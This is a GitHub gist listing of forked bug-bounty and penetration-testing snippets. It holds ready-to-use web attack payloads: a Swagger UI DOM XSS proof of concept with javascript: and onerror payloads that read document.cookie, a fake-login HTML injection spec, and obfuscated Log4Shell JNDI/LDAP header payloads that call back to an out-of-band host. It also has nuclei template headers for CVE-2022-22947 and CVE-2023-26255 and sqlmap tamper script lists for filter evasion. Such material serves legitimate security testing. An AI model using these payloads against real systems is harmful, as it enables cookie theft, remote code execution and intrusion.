emadshanab
/ CVE-2022-22947.yaml
Created
December 12, 2023 02:12
— forked from 0x240x23elu/CVE-2022-22947.yaml
CVE-2022-22947
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| id: CVE-2022-22947 | |
| info: | |
| name: CVE-2022-22947 | |
| author: 0x240x23elu | |
| severity: critical | |
| description: Spring Cloud Gateway Actuator API SpEL Code Injection (CVE-2022-22947) | |
| reference: | |
| - https://github.com/vulhub/vulhub/tree/master/spring/CVE-2022-22947 | |
| tags: cve,cve2022,rce,spring |
emadshanab
/ CVE-2023-26255.yaml
Created
December 12, 2023 02:12
— forked from 0x240x23elu/CVE-2023-26255.yaml
CVE-2023-26255
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| id: CVE-2023-26255 | |
| info: | |
| name: Stagil navigation for jira - Local File Inclusion | |
| author: 0x240x23elu | |
| severity: high | |
| description: Prior to version 2.0.52 of the “Stagil navigation for jira – Menù & Themes", the fileName parameter is vulnerable to a "Directory Traversal" that would allow an attacker to read files on the server knowing their path | |
| reference: | |
| - https://github.com/1nters3ct/CVEs/blob/main/CVE-2023-26255.md | |
| cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N |
emadshanab
/ test.yaml
Created
December 10, 2023 13:05
— forked from zenelite123/test.yaml
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| swagger: '2.0' | |
| info: | |
| version: 1.0.0 | |
| title: Fake Login Page | |
| description: '<div class="login-form"> | |
| <div class="heading"> | |
| <h1>HTML Injection : Fake Login</h1> | |
| </div> | |
| <div class="form-container"> | |
| <form action="https://example.com/login" method="post" class="form-signin"> |
emadshanab
/ xss.json
Created
December 10, 2023 13:05
— forked from zenelite123/xss.json
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| { | |
| "url": "https://gist.githubusercontent.com/zenelite123/72274842b61e6abdc0c6a7e4edb62b6f/raw/f436f20513608e8c947d224d8fcb671e2587980a/xss.yaml", | |
| "urls": [ | |
| { | |
| "url": "https://gist.githubusercontent.com/zenelite123/72274842b61e6abdc0c6a7e4edb62b6f/raw/f436f20513608e8c947d224d8fcb671e2587980a/xss.yaml", | |
| "name": "Foo" | |
| } | |
| ] | |
| } |
emadshanab
/ xss.yaml
Created
December 10, 2023 13:05
— forked from zenelite123/xss.yaml
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| swagger: '2.0' | |
| securityDefinitions: | |
| a: | |
| type: oauth2 | |
| authorizationUrl: javascript:alert(document.domain)// | |
| info: | |
| version: "0.0.1" | |
| title: DOM XSS PoC | |
| description: '<form><math><mtext></form><form><mglyph><svg><mtext><style><path id="</style><img onerror=alert(document.cookie) src>">' | |
| termsOfService: "javascript:alert(document.cookie)" |
emadshanab
/ test.json
Created
December 10, 2023 13:05
— forked from zenelite123/test.json
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| { | |
| "url": "https://gist.githubusercontent.com/zenelite123/61360869361ff88d7ce3aec863be7785/raw/227f1d30bb292b1d981b30277236c52acb98ae88/test.yaml", | |
| "urls": [ | |
| { | |
| "url": "https://gist.githubusercontent.com/zenelite123/61360869361ff88d7ce3aec863be7785/raw/227f1d30bb292b1d981b30277236c52acb98ae88/test.yaml", | |
| "name": "Test" | |
| } | |
| ] | |
| } |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| User-Agent: ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}${lower:i}}://${hostName}.{{burp}}/s2edwin} | |
| X-Api-Version: ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}${lower:i}}://${hostName}.{{burp}}/s2edwin} | |
| Referer: ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}${lower:i}}://${hostName}.{{burp}}/s2edwin} | |
| X-Forwarded-For: ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}${lower:i}}://${hostName}.{{burp}}/s2edwin} | |
| Authentication: ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}${lower:i}}://${hostName}.{{burp}}/s2edwin} | |
| User-Agent: ${jndi:ldap://127.0.0.1#{{${hostName}.{{burp}}}}/{{random}}} | |
| X-Api-Version: ${jndi:ldap://127.0.0.1#{{${hostName}.{{burp}}}}/{{random}}} | |
| Referer: ${jndi:ldap://127.0.0.1#{{${hostName}.{{burp}}}}/{{random}}} | |
| X-Forwarded-For: ${jndi:ldap://127.0.0.1#{{${hostName}.{{burp}}}}/{{random}}} |
emadshanab
/ burp_scopes.py
Created
June 27, 2023 14:30
— forked from ajxchapman/burp_scopes.py
Turn a list of scopes into a Burpsuite target import JSON configuration file
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import json | |
| import re | |
| import sys | |
| scopes = [] | |
| f = sys.stdin | |
| if len(sys.argv) == 2: | |
| f = open(sys.argv[1]) | |
| scopes_defs = [x.strip().lower() for x in f.readlines() if len(x.strip())] |
emadshanab
/ Filename extension list
Created
April 18, 2023 08:07
— forked from securifera/Filename extension list
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| .php | |
| .html | |
| .txt | |
| .htm | |
| .aspx | |
| .asp | |
| .js | |
| .css | |
| .pgsql.txt | |
| .mysql.txt |
emadshanab
/ sqlmap tamper scripts
Created
December 6, 2022 02:24
— forked from sapran/sqlmap tamper scripts
sqlmap tamper scripts grouped by DBMS Copied from: https://prakash-khadka.com.np/wp-content/uploads/pdf/www-moonsec-com.pdf
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # All scripts | |
| ``` | |
| --tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,randomcomments,securesphere,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords | |
| ``` | |
| # General scripts | |
| ``` | |
| --tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes | |
| ``` | |
| # Microsoft access | |
| ``` |